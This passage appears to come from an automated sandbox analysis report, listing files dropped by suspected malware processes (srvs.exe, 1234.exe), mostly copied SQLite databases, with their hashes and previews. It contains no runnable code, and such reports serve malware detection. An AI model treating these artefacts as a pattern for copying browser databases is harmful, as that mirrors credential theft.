                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.69422273140364
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                              MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                              SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                              SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                              SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpB9AA.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpB9AB.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpB9AC.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpB9AD.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpB9ED.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                              Entropy (8bit):0.6970840431455908
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                              MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                              SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                              SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                              SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpB9EE.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                              Entropy (8bit):0.6970840431455908
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                              MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                              SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                              SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                              SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpC7.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpC8.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpD9.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDA.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDB.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDC.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDEB3.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDEB4.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDED4.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDED5.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDED6.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDED7.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpEE1E.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpEE1F.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
